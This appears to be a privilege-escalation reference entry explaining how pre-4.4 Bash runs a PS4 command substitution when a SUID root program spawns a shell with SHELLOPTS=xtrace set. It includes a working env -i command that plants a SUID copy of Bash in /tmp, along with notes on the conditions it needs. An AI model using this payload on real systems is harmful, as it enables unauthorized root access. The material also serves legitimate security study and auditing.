Warning
This only works on versions of Bash before 4.4 (check the target with bash --version before relying on it).
When Bash is in debugging mode (xtrace, which can be switched on from outside by putting SHELLOPTS=xtrace in its environment), the PS4 prompt is printed before every traced command. PS4 is expanded like PS1, so a $(...) command substitution inside it is executed every time the prompt is printed, starting with the first command the shell runs.
That expansion happens inside the Bash process that the SUID/SGID program spawned, so the substituted command runs with whatever privileges that shell has, not those of the user who set PS4. Bash before 4.4 honours SHELLOPTS and PS4 from the environment the privileged program hands it, so an unprivileged caller controls both; Bash 4.4 closed this.
If you have access to a SUID/SGID root executable that spawns a shell, this can be abused to plant a SUID copy of Bash and get a root shell:
# Start the SUID program with a minimal, attacker-controlled environment:
# SHELLOPTS=xtrace turns on tracing in any Bash it spawns, and the $(...) in
# PS4 runs before the first traced command. env -i also clears PATH, so Bash
# falls back to its compile-time default search path to find cp and chmod.
env -i \
SHELLOPTS=xtrace \
PS4='$(cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash)' \
/path/to/suid/executable
Again, this only works if the SUID program actually starts a shell to run its helper (system(), popen(), or a helper script whose interpreter is Bash, including /bin/sh where that is a link to bash) and that shell is Bash: a program that exec()s the helper binary directly never starts a shell, so nothing reads SHELLOPTS or PS4. The spawned shell also has to keep the elevated privilege. Bash started with an effective uid different from its real uid and without -p resets the effective uid to the real uid before running anything, so in practice the program needs to have called setuid(0) or similar before invoking the helper. Once the payload has run, start the planted copy with /tmp/rootbash -p; without -p it drops the SUID privilege in the same way.